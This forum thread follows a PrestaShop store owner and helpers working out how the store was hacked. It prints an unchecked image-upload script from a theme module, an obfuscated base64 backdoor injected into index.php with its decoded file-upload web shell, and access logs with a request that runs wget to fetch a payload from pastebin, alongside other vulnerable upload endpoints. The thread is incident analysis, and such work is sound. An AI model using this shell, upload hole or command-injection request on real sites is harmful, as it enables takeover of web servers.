there are Vulnerability with supershop theme,my prestashop was hacked

[TiaNex Shopping]

 

 

it's very possible the web shell file was upload from some modules of supershop theme,

i also installed kuteshop theme,

unlucky, the hacker deleted all my website files,

 

nearly we can make sure the back door file php file to get web shell was upload from

 \modules\verticalmegamenus\VerticalMegaMenusUploadImage.php

the code with Serious security problem

it doesn't verify the file types and audit the permission at all,

i bought this theme,but it ruin my store !

 

<?php
require_once(dirname(__FILE__).'../../../config/config.inc.php');
require_once(dirname(__FILE__).'../../../init.php');
require_once(dirname(__FILE__).'/verticalmegamenus.php');
$tempPath = _PS_MODULE_DIR_.'verticalmegamenus/images/temps/';
$fileName = $_FILES["uploadimage"]["name"];
$pathFile = $tempPath.$fileName;
if(($_FILES["uploadimage"]["size"] > 1000000)){
	echo "File size is greater than 1MB";
}else{
	if (@move_uploaded_file($_FILES['uploadimage']['tmp_name'], $pathFile)) {		
	  	echo $fileName; 
	}else {
		echo "File upload failed.";
	}	
}
?>

 

 

 

one the web shell back door file,

the index.php was modified with these code at the begin of the file

<?php if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){
    $func="cr"."ea"."te_"."fun"."ction";
    $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");
    $x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVzWyJuYW1lIl0gIT0gJycpIHsKICAgICRmdWxscGF0aCA9ICRfUkVRVUVTVFsicGF0aCJdIC4gJGZpbGVzWyJuYW1lIl07CiAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRmaWxlc1sndG1wX25hbWUnXSwgJGZ1bGxwYXRoKSkgewogICAgICAgIGVjaG8gIjxoMT48YSBocmVmPSckZnVsbHBhdGgnPkRvbmUhIE9wZW48L2E+PC9oMT4iOwogICAgfQp9ZWNobyAnPGh0bWw+PGhlYWQ+PHRpdGxlPlVwbG9hZCBmaWxlcy4uLjwvdGl0bGU+PC9oZWFkPjxib2R5Pjxmb3JtIG1ldGhvZD1QT1NUIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIGFjdGlvbj0iIj48aW5wdXQgdHlwZT10ZXh0IG5hbWU9cGF0aD48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZXMiPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iVVBsb2FkIj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4nOwo/Pg==");
    exit;}?><?php

after decode

<?php

$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>Done! Open</a></h1>";
    }
}echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="UPload"></form></body></html>';
?>

 

Edited September 24, 2019 by irder (see edit history)

[NemoPS]

well yeah, that's a hack. What happens if you replace the content? Are you using any module that allows uploads? I would check those folders first.

[TiaNex Shopping]

36 minutes ago, NemoPS said:

well yeah, that's a hack. What happens if you replace the content? Are you using any module that allows uploads? I would check those folders first.

here are some access logs 

maybe the web shell file was uploaded from the last few lines

 

216.244.66.229 - - [12/Sep/2019:03:57:49 +0000] "GET /item/1167/chinese-letter-print-restaurant-waitress-jacket-waiter-uniform.html HTTP/1.1" 301 -
217.61.98.64 - - [12/Sep/2019:04:09:40 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
217.61.98.64 - - [12/Sep/2019:04:09:44 +0000] "GET /spy.php HTTP/1.1" 404 78683
217.61.98.64 - - [12/Sep/2019:04:09:46 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
217.61.98.64 - - [12/Sep/2019:04:09:47 +0000] "GET /spy.php HTTP/1.1" 404 78683
217.61.98.64 - - [12/Sep/2019:04:13:46 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
217.61.98.64 - - [12/Sep/2019:04:13:46 +0000] "GET /spy.php HTTP/1.1" 404 78683
217.61.98.64 - - [12/Sep/2019:04:13:49 +0000] "POST /modules/smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php HTTP/1.1" 404 78744
217.61.98.64 - - [12/Sep/2019:04:14:22 +0000] "POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image HTTP/1.1" 404 78768
217.61.98.64 - - [12/Sep/2019:04:14:23 +0000] "GET /modules/jmsslider/views/img/layers/spy.php HTTP/1.1" 404 78718
217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/groupcategory/GroupCategoryUploadImage.php HTTP/1.1" 200 36
217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7
217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3297
217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
217.61.98.64 - - [12/Sep/2019:04:14:26 +0000] "GET /spy.php HTTP/1.1" 404 78683
217.61.98.64 - - [12/Sep/2019:04:14:27 +0000] "POST /modules/smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php HTTP/1.1" 404 78744
217.61.98.64 - - [12/Sep/2019:04:15:02 +0000] "POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image HTTP/1.1" 404 78768
217.61.98.64 - - [12/Sep/2019:04:15:03 +0000] "GET /modules/jmsslider/views/img/layers/spy.php HTTP/1.1" 404 78718
217.61.98.64 - - [12/Sep/2019:04:15:04 +0000] "POST /modules/groupcategory/GroupCategoryUploadImage.php HTTP/1.1" 200 36
217.61.98.64 - - [12/Sep/2019:04:15:04 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7
217.61.98.64 - - [12/Sep/2019:04:15:05 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3302
216.244.66.197 - - [12/Sep/2019:04:15:22 +0000] "GET /robots.txt HTTP/1.1" 200 2620

 

[TiaNex Shopping]

maybe  /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php

[razaro]

Yeah  and looks it start from  /modules/bamegamenu/ajax_phpcode.php also.

Similar hack like 3 years ago

that target upload forms.

 

Check this topic for advises.

[TiaNex Shopping]

1 minute ago, razaro said:

Yeah  and looks it start from  /modules/bamegamenu/ajax_phpcode.php also.

Similar hack like 3 years ago

that target upload forms.

 

Check this topic for advises.

yes, it's from 

217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7

217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3297

i installed this module  verticalmegamenus and the first new folder was temps

[juliyvchirkov]

jmsslider module also has critical security issue at ajax_jmsslider.php

one can upload any file type with any extension thru POST request /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image

uploaded file is moved to /modules/jmsslider/views/img/layers/ folder

sample log follows

- -  02/Jan/2021:15:04:50 +0200 `POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image` 200 /home/zalupa/htdocs/modules/jmsslider/ajax_jmsslider.php 140.453 4096 42.72%
- -  02/Jan/2021:15:04:51 +0200 `GET /modules/jmsslider/views/img/layers/small.php` 200 /home/zalupa/htdocs/modules/jm
sslider/views/img/layers/small.php 0.806 2048 0.00%